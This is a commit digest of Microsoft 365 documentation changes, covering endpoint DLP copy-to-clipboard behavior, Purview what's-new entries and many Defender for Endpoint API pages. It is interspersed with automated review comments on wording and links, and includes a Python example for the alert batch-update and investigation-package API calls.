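Review bot: the rewritten "Copy to clipboard" row has a grammar error and a missing period: "If the rule is configure to" should be "If the rule is configured to", and the sentence needs a full stop before the closing cell separator. The action list also changed from "block, warn, or audit" to "block, block with override, or audit", which differs from every other row in this table; if "warn" and "block with override" denote the same action, use one term throughout. Context line typo: "unallowed Bluetooth aps".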
+### Copy to clipboard behavior
+
+When you configure a rule to **Block** or **Block with override** when a user attempts the Copy to clipboard activity on a file that matches the policy, end users see this behavior with these configurations:
+
+- Word file 123 contains sensitive information that matches the copy to clipboard Block rule.
+- Excel file 123 contains sensitive information that matches the copy to clipboard Block rule.
+- PowerPoint file 123 contains sensitive information that matches the copy to clipboard Block rule.
+
+- Word file 789 doesn't contain sensitive information.
+- Excel file 789 doesn't contain sensitive information.
+- PowerPoint file 789 doesn't contain sensitive information.
+
+- Notepad (or any non Microsoft Office based app or process) file XYZ contains sensitive information that matches the copy to clipboard Block rule.
+- Notepad (or any non Microsoft Office based app or process) file ABC doesn't contain sensitive information.
+
+|Source |Destination |Behavior |
+||||
+|Word file 123/Excel file 123/PowerPoint file 123 |Word file 123/Excel file 123/PowerPoint file 123 |copy and paste are allowed, in other words intra file copy and paste is allowed. |
+|Word file 123/Excel File 123/PowerPoint file 123 |Word file 789/Excel file 789/PowerPoint file 789 |copy and paste are blocked, in other words inter file copy and paste is blocked. |
+|Word file 789/Excel file 789/PowerPoint file 789 |Word file 123/Excel File 123/PowerPoint file 123 |copy and paste are allowed|
+|Word file 123/Excel file 123/PowerPoint file 123 |Notepad file ABC |copy and paste are blocked |
+|Notepad file XYZ | any | copy is blocked|
+|Notepad file ABC | any | copy and paste are allowed|
+ ## Best practice for endpoint DLP policies
-Say you want to block all items that contain credit card numbers from leaving endpoints of Finance department users. We recommend the following:
+Say you want to block all items that contain credit card numbers from leaving endpoints of Finance department users. We recommend:
- Create a policy and scope it to endpoints and to that group of users. - Create a rule in the policy that detects the type of information that you want to protect. In this case, set **content contains** to *Sensitive information type**, and select **Credit Card**.
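Review bot: the new "Copy to clipboard behavior" table does not cover the "Block with override" case its heading names: every row says only blocked or allowed, so state what the user sees when the rule is set to Block with override (whether an override prompt appears, and whether the action is audited). Two rows are also ambiguous: "Notepad file XYZ | any | copy is blocked" differs from the other rows' "copy and paste", and there is no row for a non-sensitive Office file (789) pasted into Notepad. Minor wording: "non Microsoft Office based app" should be "non-Microsoft Office app", and in the Best practice bullet "*Sensitive information type**" has unbalanced asterisks.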
If the extension is changed only to supported file extensions:
### File types
-File types are a grouping of file formats. They are utilized to protect specific workflows or areas of business. You can use one or more file types as conditions in your DLP policies.
+File types are a grouping of file formats. They're utilized to protect specific workflows or areas of business. You can use one or more file types as conditions in your DLP policies.
| File Type | Apps | Monitored file extensions | | | -- | --|
Onboarding and offboarding are handled via scripts that you download from the de
Use the procedures in [Getting started with Microsoft 365 Endpoint DLP](endpoint-dlp-getting-started.md) to onboard devices.
-If you have onboarded devices through [Microsoft Defender for Endpoint](../security/defender-endpoint/configure-machines-onboarding.md), those devices will show up automatically in the list of devices. This is because onboarding to Defender also onboards devices to DLP. You only need to **Turn on device monitoring** to use endpoint DLP.
+If you have onboarded devices through [Microsoft Defender for Endpoint](../security/defender-endpoint/configure-machines-onboarding.md), those devices show up automatically in the list of devices. This is because onboarding to Defender also onboards devices to DLP. You only need to **Turn on device monitoring** to use endpoint DLP.
> [!div class="mx-imgBorder"] > ![managed devices list.](../media/endpoint-dlp-learn-about-2-device-list.png)
compliance Whats New https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/whats-new.md
f1.keywords:
Previously updated : 07/17/2023 Last updated : 07/18/2023 audience: Admin
Whether it be adding new solutions to the [Microsoft Purview compliance portal](
## July 2023
+### Communication compliance
+
+- **Support for advanced sensitive info types**: Communication compliance now [supports four advanced sensitive information types](communication-compliance-policies.md#sensitive-information-types): All credentials, All full names, All medical terms and conditions, and All physical addresses.
+- **New conditions**: [Use the following new conditions to monitor communications that cross the firewall](communication-compliance-policies.md#conditional-settings):
+ - Message is received from any of these external email addresses
+ - Message is not received from any of these external email addresses
+ - Message is sent to any of these external email addresses
+ - Message is not sent to any of these external email addresses
+- **New Policy settings button**: [View policy settings without opening a policy](communication-compliance-investigate-remediate.md).
+- **New Filter bar**: [Key filters (**Body/Subject**, **Date**, **Sender**, and **Tags**) are always displayed](communication-compliance-investigate-remediate.md#using-filters) to make it easier to filter.
+
+### Insider risk management
+
+- **In preview**: [Bring your own detections (BYOD)](import-insider-risk-indicators.md). Use the new BYOD detections feature to import third-party insider risk detections and create custom indicators.
+- **Save a view of a filter in the Activity explorer**: If you create a filter and customize columns for the filter, [save a view of your changes to quickly apply again later](insider-risk-management-activities.md#).
+- **Support for virtualized environments**: Insider risk management now [supports virtualized environments through endpoint DLP](insider-risk-management-settings-policy-indicators.md#enable-device-indicators-and-onboard-windows-devices).
+- **General availability (GA)**:
+ - [Import physical badging data connector](import-physical-badging-data.md)
+ - [Identify priority physical assets setting](insider-risk-management-settings-priority-physical-assets.md)
+- **Additional templates for browser signal detection**: [Browser signal detection is now used for the *Data theft by departing users*, *Data leaks*, and *Risky browser usage (preview)* templates](insider-risk-management-browser-support.md).
+- Update for the [maximum size of a priority user group](insider-risk-management-settings-priority-user-groups.md#create-a-priority-user-group).
+ ### Sensitivity labels - **General availability (GA)**: [Support for administrative units](get-started-with-sensitivity-labels.md#support-for-administrative-units).
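Review bot: the link in the "Save a view of a filter in the Activity explorer" bullet ends with an empty fragment, "insider-risk-management-activities.md#"; either supply the anchor or drop the trailing "#". The "Bring your own detections (BYOD)" abbreviation collides with the far more common expansion "bring your own device"; spell it out at each use or pick a different short form so readers scanning the list are not misled.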
Whether it be adding new solutions to the [Microsoft Purview compliance portal](
## June 2023
+### Communication compliance
+
+- Update to note that for the *Export* option in detailed reports, [the items and actions displayed are only for the items and actions matched during the date range included in the date range filter](communication-compliance-reports-audits.md#detailed-reports).
+ ### Compliance Manager - Update to clarify that some [automatically tested actions](compliance-manager-improvement-actions.md#testing-work) might show a status of "Out of scope" within the first 24 hours of setup with Microsoft Defender for Cloud monitoring.
includes Defender M3d Techcommunity https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/includes/defender-m3d-techcommunity.md
> [!TIP]
-> Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: [Microsoft 365 Defender Tech Community](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/bg-p/MicrosoftThreatProtectionBlog).
+> Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: [Microsoft 365 Defender Tech Community](https://techcommunity.microsoft.com/t5/microsoft-365-defender/bd-p/MicrosoftThreatProtection).
includes Defender Mde Techcommunity https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/includes/defender-mde-techcommunity.md
+
+ Title: Microsoft Defender for Endpoint tech community
+description: Microsoft 365 Defender tech community engagement.
Last updated : 07/21/2023++++++++
+> [!TIP]
+> Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: [Microsoft Defender for Endpoint Tech Community](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/bd-p/MicrosoftDefenderATP).
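Review bot: the new include's description says "Microsoft 365 Defender tech community engagement" while its title and link are for Microsoft Defender for Endpoint; change the description to match. The "Last updated : 07/21/2023" date is also later than the 07/18/2023 date used by the other files in this batch, and the front matter shows a run of added blank lines after it; check both are intended.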
security Get Agent Details https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/Get-agent-details.md
GET https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanAgents/7
} ```
security Get Scan History By Definition https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/Get-scan-history-by-definition.md
POST https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinit
} ```
security Get Scan History By Session https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/Get-scan-history-by-session.md
POST https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinit
] } ```
security Access Mssp Portal https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/access-mssp-portal.md
Use the following steps to obtain the MSSP customer tenant ID and then use the I
- [Grant MSSP access to the portal](grant-mssp-access.md) - [Configure alert notifications](configure-mssp-notifications.md) - [Fetch alerts from customer tenant](fetch-alerts-mssp.md)
security Add A New Scan Definition https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/add-a-new-scan-definition.md
POST https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinit
"ScanDefinitionIds": ["td32f17af-5cc2-4e4e-964a-4c4ef7d216e2", "ab32g20af-5dd2-4a5e-954a-4c4ef7d216e2"], } ```
security Add Or Remove Machine Tags https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/add-or-remove-machine-tags.md
POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2
``` To remove machine tag, set the Action to 'Remove' instead of 'Add' in the request body.
security Add Or Remove Multiple Machine Tags https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/add-or-remove-multiple-machine-tags.md
POST https://api.securitycenter.microsoft.com/api/machines/AddOrRemoveTagForMult
``` To remove machine tags, set the Action to 'Remove' instead of 'Add' in the request body.
security Admin Submissions Mde https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/admin-submissions-mde.md
The submission is available on the **Files** tab of the **Submissions** page at
- [Microsoft Defender for Endpoint in Microsoft 365 Defender](../defender/microsoft-365-security-center-mde.md) - [Address false positives/negatives](defender-endpoint-false-positives-negatives.md) - [View and organize alerts queue in Microsoft Defender for Endpoint](alerts-queue.md)
security Advanced Features https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/advanced-features.md
Backup quarantined files in a secure and compliant location so they can be downl
- [Update data retention settings](data-retention-settings.md) - [Configure alert notifications](configure-email-notifications.md)
security Alerts Queue Endpoint Detection Response https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/alerts-queue-endpoint-detection-response.md
Topic|Description
[Investigate an IP address](investigate-ip.md)|Examine possible communication between devices in your network and external internet protocol (IP) addresses. [Investigate a domain](investigate-domain.md)|Investigate a domain to see if devices and servers in your network have been communicating with a known malicious domain. [Investigate a user account](investigate-user.md)|Identify user accounts with the most active alerts and investigate cases of potential compromised credentials.
security Alerts Queue https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/alerts-queue.md
You can choose to filter the alerts based on their Automated investigation state
- [Investigate an IP address associated with a Microsoft Defender for Endpoint alert](investigate-ip.md) - [Investigate a domain associated with a Microsoft Defender for Endpoint alert](investigate-domain.md) - [Investigate a user account in Microsoft Defender for Endpoint](investigate-user.md)
security Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/alerts.md
GET https://api.securitycenter.microsoft.com/api/alerts/da637472900382838869_136
## Related articles [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)
security Analyzer Feedback https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/analyzer-feedback.md
If you have feedback or suggestions that would help us improve the Microsoft Def
2. Microsoft 365 Defender portal (security.microsoft.com): :::image type="content" source="images/1d5b3c010b4b5c0e9d5eb43f71fa95e3.png" alt-text="The Give feedback button" lightbox="images/1d5b3c010b4b5c0e9d5eb43f71fa95e3.png":::
security Analyzer Report https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/analyzer-report.md
To include analyzer result files [when opening a support ticket](contact-support
> [!NOTE] > If the file size is larger than 25 MB, the support engineer assigned to your case will provide a dedicated secure workspace to upload large files for analysis.
security Android Configure Mam https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-configure-mam.md
Use the following steps to configure the Disable sign out:
- [Deploy Microsoft Defender for Endpoint on Android with Microsoft Intune](android-intune.md)
security Android Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-configure.md
Use the following steps to configure Disable sign-out:
- [Overview of Microsoft Defender for Endpoint on Android](microsoft-defender-endpoint-android.md) - [Deploy Microsoft Defender for Endpoint on Android with Microsoft Intune](android-intune.md)
security Android Intune https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-intune.md
Organizations can communicate to their users to protect Personal profile with Mi
- [Overview of Microsoft Defender for Endpoint on Android](microsoft-defender-endpoint-android.md) - [Configure Microsoft Defender for Endpoint on Android features](android-configure.md)
security Android Privacy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-privacy.md
Optional data includes diagnostic data and feedback data. Optional diagnostic da
- The user's email address, if they choose to provide it. - Feedback type (smile, frown, idea) and any feedback comments submitted by the user.
security Android Support Signin https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-support-signin.md
If a user faces an issue, which isn't already addressed in the above sections or
:::image type="content" source="images/finalsubmit5.png" alt-text="The pane on which you can add details and attach diagnostic data" lightbox="images/finalsubmit5.png"::: 6. Click on "Submit" to successfully send the feedback.
security Android Whatsnew https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-whatsnew.md
Notify your users and helpdesk (as applicable) that users will need to accept th
> [!NOTE] > This permission allows Microsoft Defender for Endpoint to access storage on the user's device, which helps detect and remove malicious and unwanted apps. Microsoft Defender for Endpoint accesses and scans Android app package files (.apk) only. On devices with a Work Profile, Defender for Endpoint scans only work-related files.
security Api Explorer https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api-explorer.md
Credentials to access an API aren't needed. The API Explorer uses the Defender f
The logged-in user's authentication credential is used to verify that the API Explorer is authorized to access data on your behalf. Specific API requests are limited based on your RBAC privileges. For example, a request to "Submit indicator" is limited to the security admin role.
security Api Hello World https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api-hello-world.md
You're all done! You have just successfully:
- [Microsoft Defender for Endpoint APIs](exposed-apis-list.md) - [Access Microsoft Defender for Endpoint with application context](exposed-apis-create-app-webapp.md) - [Access Microsoft Defender for Endpoint with user context](exposed-apis-create-app-nativeapp.md)
security Api Microsoft Flow https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api-microsoft-flow.md
You can also create a **scheduled** flow that runs Advanced Hunting queries and
## Related topic - [Microsoft Defender for Endpoint APIs](apis-intro.md)
security Api Power Bi https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api-power-bi.md
View the Microsoft Defender for Endpoint Power BI report samples. For more infor
- [Defender for Endpoint APIs](apis-intro.md) - [Advanced Hunting API](run-advanced-query-api.md) - [Using OData Queries](exposed-apis-odata-samples.md)
security Api Release Notes https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api-release-notes.md
The following information lists the updates made to the Microsoft Defender for E
### 01.09.2020 - Added option to expand the Alert entity with its related Evidence. See [List Alerts](get-alerts.md).
security Apis Intro https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/apis-intro.md
You can access Defender for Endpoint API with **Application Context** or **User
- [Microsoft Defender for Endpoint APIs](exposed-apis-list.md) - [Access Microsoft Defender for Endpoint with application context](exposed-apis-create-app-webapp.md) - [Access Microsoft Defender for Endpoint with user context](exposed-apis-create-app-nativeapp.md)
security Application Deployment Via Mecm https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/application-deployment-via-mecm.md
Copy the unified solution package, onboarding script and migration script to the
- [Microsoft Defender for Endpoint - Configuration Manager](/mem/configmgr/protect/deploy-use/defender-advanced-threat-protection) - [Onboard Windows servers to the Microsoft Defender for Endpoint service](configure-server-endpoints.md) - [Microsoft Defender for Endpoint: Defending Windows Server 2012 R2 and 2016](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/defending-windows-server-2012-r2-and-2016/ba-p/2783292)
security Assign Portal Access https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/assign-portal-access.md
Defender for Endpoint supports two ways to manage permissions:
- [Use basic permissions to access the portal](basic-permissions.md) - [Manage portal access using RBAC](rbac.md)
security Attack Simulations https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-simulations.md
Read the walkthrough document provided with each attack scenario. Each document
- [Onboard devices](onboard-configure.md) - [Onboard Windows devices](configure-endpoints.md)
security Attack Surface Reduction Rules Deployment Implement https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-deployment-implement.md
You can customize the notification for when a rule is triggered and blocks an ap
## See also - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security Attack Surface Reduction Rules Deployment Operationalize https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-deployment-operationalize.md
For more information about hunting options, see: [Demystifying attack surface re
[Enable attack surface reduction (ASR) rules](attack-surface-reduction-rules-deployment-implement.md) [Attack surface reduction (ASR) rules reference](attack-surface-reduction-rules-reference.md)
security Attack Surface Reduction Rules Deployment Plan https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-deployment-plan.md
See: [Create a deployment plan for Windows](/windows/deployment/update/create-de
[Operationalize attack surface reduction (ASR) rules](attack-surface-reduction-rules-deployment-operationalize.md) [Attack surface reduction (ASR) rules reference](attack-surface-reduction-rules-reference.md)
security Attack Surface Reduction Rules Deployment Test https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-deployment-test.md
Event ID | Description
[Operationalize attack surface reduction (ASR) rules](attack-surface-reduction-rules-deployment-operationalize.md) [Attack surface reduction (ASR) rules reference](attack-surface-reduction-rules-reference.md)
security Attack Surface Reduction Rules Deployment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-deployment.md
Some rules don't work well if un-signed, internally developed application and sc
[ASR rules Configurations](https://security.microsoft.com/asr?viewid=configuration) [ASR rules Exclusions](https://security.microsoft.com/asr?viewid=exclusions)
security Attack Surface Reduction Rules Reference https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference.md
Dependencies: Microsoft Defender Antivirus, Cloud Protection
- [Attack surface reduction \(ASR\) rules report](attack-surface-reduction-rules-report.md) - [Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md) - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security Attack Surface Reduction Rules Report https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-report.md
The Add exclusion page has two buttons for actions that can be used on any detec
- [Operationalize attack surface reduction (ASR) rules](attack-surface-reduction-rules-deployment-operationalize.md) - [Attack surface reduction \(ASR\) rules report](attack-surface-reduction-rules-report.md) - [Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md)
security Attack Surface Reduction https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction.md
The "engine version" listed for attack surface reduction events in the event log
> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md) > - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Auto Investigation Action Center https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/auto-investigation-action-center.md
To get to the unified Action center in the improved Microsoft 365 Defender porta
- [Address false positives/negatives in Microsoft Defender for Endpoint](defender-endpoint-false-positives-negatives.md) - [Compare security features in Microsoft 365 plans for small and medium-sized businesses](../defender-business/compare-mdb-m365-plans.md)
security Autoir Investigation Results https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/autoir-investigation-results.md
To provide more context about how investigation states show up, the following ta
- [Review remediation actions following an automated investigation](manage-auto-investigation.md) - [View and organize the Microsoft Defender for Endpoint Incidents queue](view-incidents-queue.md)
security Automated Investigations https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/automated-investigations.md
Currently, AIR only supports the following OS versions:
- [PUA protection](/windows/security/threat-protection/microsoft-defender-antivirus/detect-block-potentially-unwanted-apps-microsoft-defender-antivirus) - [Automated investigation and response in Microsoft Defender for Office 365](/microsoft-365/security/office-365-security/air-about) - [Automated investigation and response in Microsoft 365 Defender](/microsoft-365/security/defender/m365d-autoir)
security Automation Levels https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/automation-levels.md
Automated investigation and remediation (AIR) capabilities in Microsoft Defender
- [Configure automated investigation and remediation capabilities in Defender for Endpoint](configure-automated-investigations-remediation.md) - [Visit the Action Center](/microsoft-365/security/defender-endpoint/auto-investigation-action-center#the-action-center)
security Azure Server Integration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/azure-server-integration.md
The following capabilities are included in this integration:
- [Onboard previous versions of Windows](onboard-downlevel.md) - [Onboard Windows Server 2012 R2, 2016, SAC version 1803, and 2019](configure-server-endpoints.md)
security Basic Permissions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/basic-permissions.md
For more information, see [Assign administrator and non-administrator roles to u
## Related topic - [Manage portal access using RBAC](rbac.md)
security Batch Update Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/batch-update-alerts.md
POST https://api.securitycenter.microsoft.com/api/alerts/batchUpdate
"comment": "Resolve my alert and assign to secop2" } ```
security Behavioral Blocking Containment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/behavioral-blocking-containment.md
This example shows that with behavioral blocking and containment capabilities, t
- [See recent global threat activity](https://www.microsoft.com/wdsi/threats) - [Get an overview of Microsoft 365 Defender](../defender/microsoft-365-defender.md)
security Built In Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/built-in-protection.md
Built-in protection is a set of default settings. You aren't required to keep th
- [Configure Microsoft Defender for Endpoint in Intune](/mem/intune/protect/advanced-threat-protection-configure) - [Manage Microsoft Defender for Endpoint on devices with Microsoft Intune](/mem/intune/protect/mde-security-integration) - [Responding to ransomware attacks](../defender/playbook-responding-ransomware-m365-defender.md)
security Cancel Machine Action https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/cancel-machine-action.md
https://api.securitycenter.microsoft.com/api/machineactions/988cc94e-7a8f-4b28-a
## Related article - [Get machine action API](get-machineaction-object.md)
security Check Sensor Status https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/check-sensor-status.md
You can view the device details when you click on a misconfigured or inactive de
- [Run the client analyzer on Windows](run-analyzer-windows.md) - [Run the client analyzer on macOS or Linux](run-analyzer-macos-linux.md) - [Data collection for advanced troubleshooting on Windows](data-collection-analyzer.md)
security Client Behavioral Blocking https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/client-behavioral-blocking.md
If your organization is using Defender for Endpoint, client behavioral blocking
> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md) > - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Cloud Protection Microsoft Antivirus Sample Submission https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/cloud-protection-microsoft-antivirus-sample-submission.md
There are two more scenarios where Defender for Endpoint might request a file sa
[Next-generation protection overview](next-generation-protection.md) [Configure remediation for Microsoft Defender Antivirus detections.](configure-remediation-microsoft-defender-antivirus.md)
security Cloud Protection Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/cloud-protection-microsoft-defender-antivirus.md
Cloud protection is enabled by default. However, you might need to re-enable it
If your subscription includes Windows 10 E5, you can take advantage of emergency dynamic intelligence updates, which provide near real-time protection from emerging threats. When you turn on cloud protection, fixes for malware issues can be delivered via the cloud within minutes, instead of waiting for the next update. See [Configure Microsoft Defender Antivirus to automatically receive new protection updates based on reports from our cloud service](manage-event-based-updates-microsoft-defender-antivirus.md#cloud-report-updates).
security Collect Diagnostic Data Update Compliance https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/collect-diagnostic-data-update-compliance.md
On at least two devices that are not reporting or showing up in Update Complianc
- [Troubleshoot Microsoft Defender Antivirus reporting](troubleshoot-reporting.md) - [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)
security Collect Diagnostic Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/collect-diagnostic-data.md
You can also specify where the diagnostic .cab file will be created using a Grou
- [Troubleshoot Microsoft Defender Antivirus reporting](troubleshoot-reporting.md) - [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)
security Collect Investigation Package https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/collect-investigation-package.md
POST https://api.securitycenter.microsoft.com/api/machines/fb9ab6be3965095a09c05
"Comment": "Collect forensics due to alert 1234" } ```
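Both request bodies shown above (batch-updating alerts and collecting an investigation package) are plain JSON POSTs to the same API host. The following Python is an added example, not code from the Microsoft docs or from any Microsoft SDK: it builds and validates both bodies offline and, only when a bearer token is supplied through the assumed `MDE_TOKEN` environment variable, sends them with the standard library. The alert IDs and the `<machine-id>` placeholder are constructed; the accepted `status` values (New, InProgress, Resolved) follow the Update alert API, and the application permissions named in the comments are what an app-context token would need.

```python
import json
import os
import urllib.request
from typing import Iterable, Optional

API_BASE = "https://api.securitycenter.microsoft.com/api"
ALERT_STATUSES = {"New", "InProgress", "Resolved"}  # values the Update alert API accepts


def build_batch_update_body(alert_ids: Iterable[str], status: Optional[str] = None,
                            assigned_to: Optional[str] = None,
                            comment: Optional[str] = None) -> dict:
    """Body for POST /alerts/batchUpdate.

    alertIds is mandatory; the other properties are optional and are only
    emitted when set, so fields you don't pass are left untouched server-side.
    """
    ids = [str(a) for a in alert_ids]
    if not ids:
        raise ValueError("batchUpdate needs at least one alert ID")
    if status is not None and status not in ALERT_STATUSES:
        raise ValueError(f"unknown alert status {status!r}; expected one of {sorted(ALERT_STATUSES)}")
    body = {"alertIds": ids}
    if status is not None:
        body["status"] = status
    if assigned_to is not None:
        body["assignedTo"] = assigned_to
    if comment is not None:
        body["comment"] = comment
    return body


def build_collect_package_body(comment: str) -> dict:
    """Body for POST /machines/{id}/collectInvestigationPackage; Comment is required."""
    if not comment.strip():
        raise ValueError("a non-empty Comment is required for machine actions")
    return {"Comment": comment}


def post(path: str, body: dict, token: str, timeout: float = 30.0) -> dict:
    """Send a JSON POST with a bearer token. This is the only network call; the
    offline checks above never reach it."""
    req = urllib.request.Request(
        f"{API_BASE}{path}",
        data=json.dumps(body).encode("utf-8"),
        headers={"Authorization": f"Bearer {token}",
                 "Content-Type": "application/json",
                 "Accept": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)


if __name__ == "__main__":
    # Assumed: an application-context token holding Alert.ReadWrite.All and
    # Machine.CollectForensics, supplied out of band.
    token = os.environ.get("MDE_TOKEN")
    update = build_batch_update_body(
        ["121688558380765161_2136280442", "121688558380765161_2136280443"],  # constructed IDs
        status="Resolved", assigned_to="secop2@contoso.com",
        comment="Resolve my alert and assign to secop2")
    package = build_collect_package_body("Collect forensics due to alert 1234")
    print(json.dumps(update, indent=2))
    print(json.dumps(package, indent=2))
    if token:
        print(post("/alerts/batchUpdate", update, token))
        machine_id = "<machine-id>"  # placeholder: the device ID from the portal or the List machines API
        print(post(f"/machines/{machine_id}/collectInvestigationPackage", package, token))
```

Run it without `MDE_TOKEN` to see the two bodies that would be sent; with a token, the collect call returns a machine action object whose `id` can be polled and, if needed, cancelled through the machine action endpoints.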
security Command Line Arguments Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/command-line-arguments-microsoft-defender-antivirus.md
The following table lists common errors that can occur while using the MpCmdRun
- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) - [Configure Defender for Endpoint on Android features](android-configure.md) - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Common Errors https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/common-errors.md
When contacting us about an error, attaching this ID helps find the root cause o
} } ```
